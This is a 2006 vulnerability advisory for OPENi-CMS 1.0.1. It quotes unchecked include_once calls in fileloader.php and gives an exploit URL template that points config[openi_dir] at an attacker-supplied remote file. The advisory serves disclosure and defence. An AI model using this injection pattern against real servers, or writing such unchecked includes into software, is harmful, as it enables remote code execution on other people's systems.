OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2006-09-12T00:00:00


Update: 22:44 09/11/06

Subject: "OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability "

Vulnerable version: OPENi-CMS 1.0.1

Operating System: - All OS

Vendor URL: Support - Website -

Description: Openi-CMS he one software PHP Content Management System with facilities wysiwyg the editor, plugin, user management to facilitate arranged as well as the difference style website

Vulnerability: Invalid include function at fileloader.php on line at 5,6 and 7,the '$config["openi_dir"]' is not gurantee to including a files.

// openi-admin/base/fileloader.php

include_once($config["openi_dir"]."/base/constants.php"); // invalid code include_once($config["openi_dir"]."/base/db_classes.php"); // invalid code include_once($config["openi_dir"]."/base/site_classes.php"); // invalid code

Exploit: http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]

Solution: upgrade next version

Published by: basher13 (Infam0us Gr0up - Securiti Research) /